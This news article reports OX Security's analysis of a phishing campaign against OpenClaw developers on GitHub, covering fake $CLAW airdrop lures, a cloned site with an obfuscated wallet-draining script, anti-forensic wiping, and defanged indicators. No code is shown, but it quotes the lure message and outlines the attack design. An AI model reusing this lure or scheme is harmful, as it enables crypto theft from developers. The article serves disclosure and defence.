TLDR:
- Attackers created fake GitHub accounts to tag OpenClaw developers with fraudulent $5,000 $CLAW token airdrop offers.
- A cloned openclaw.ai site used obfuscated JavaScript named “eleven.js” to silently drain connected crypto wallets.
- OX Security found a “nuke” function inside the malware that erases wallet-theft data to block forensic investigation.
- The threat actor’s wallet address was identified but showed zero transactions, with no confirmed victims reported yet.
OpenClaw developers are being targeted in an active phishing campaign on GitHub. Security platform OX Security published a report on Wednesday detailing how threat actors are creating fake accounts to lure developers.
The scammers promise $5,000 worth of $CLAW tokens and direct victims to a cloned website. No confirmed victims have been reported yet, but the wallet-draining infrastructure is fully operational.
How the GitHub Phishing Campaign Operates
OpenClaw’s rapid rise to over 323,000 GitHub stars has drawn the attention of bad actors. The framework’s association with OpenAI and prominent developer Peter Steinberger makes its community an attractive target. Scammers are now exploiting that visibility to run a coordinated social engineering campaign.
Threat actors begin by creating fake GitHub accounts and opening issue threads in attacker-controlled repositories.
They then tag dozens of developers, claiming they were selected based on their GitHub activity. The message tells targets, “Appreciate your contributions on GitHub. We analyzed profiles and chose developers to get OpenClaw allocation,” promising $5,000 in $CLAW tokens.
From there, victims are directed to a cloned version of the openclaw.ai website. The fake site closely mirrors the original but includes a “Connect your wallet” button. That button triggers the wallet theft mechanism embedded within the page.
OX Security researchers found the malicious code inside a heavily obfuscated JavaScript file named “eleven.js.” After deobfuscating it, they discovered a built-in “nuke” function that wipes all wallet-stealing data from the browser’s local storage. This step is designed to frustrate any forensic analysis that follows.
The malware communicates with a separate command-and-control (C2) server using encoded data. It tracks user actions through commands like PromptTx, Approved, and Declined. Wallet addresses, transaction values, and usernames are all relayed back to the attacker in real time.
What the Research Reveals and How to Stay Protected
OX Security research team lead Moshe Siman Tov Bustan said the campaign bears resemblance to a prior phishing operation that “spread on GitHub, relating to Solana.”
He added that researchers are “[still] analyzing the behavior and the relation of these campaigns.” Confirmation of a direct link between the two is still pending.
Researchers found evidence suggesting attackers used GitHub’s star feature to identify potential victims. Bustan confirmed the campaign targeted only users who “starred the OpenClaw GitHub repository,” making the approach feel more personalized. That level of targeting makes the lure appear credible to each recipient.
One crypto wallet address, 0x6981E9EA7023a8407E4B08ad97f186A5CBDaFCf5, was identified as belonging to the threat actor.
Bustan noted that “during our analysis, we found only one address belonging to the threat actor, which hadn’t sent or received any funds yet.” The fake accounts were created last week and deleted within hours of launch.
OpenClaw creator Peter Steinberger had previously spoken about crypto spam flooding the project’s Discord “every half hour,” describing it as “nonstop coin promotion.”
That activity eventually led to a blanket ban on coin promotion within the community. The phishing campaign now extends that problem beyond Discord and directly onto GitHub.
OX Security recommends blocking the domains token-claw[.]xyz and watery-compost[.]today immediately. Developers should avoid connecting crypto wallets to unverified or newly surfaced websites.
Any GitHub issue promoting token giveaways should be treated as suspicious, especially from unknown accounts. Those who recently connected a wallet to an unfamiliar site should revoke approvals without delay.
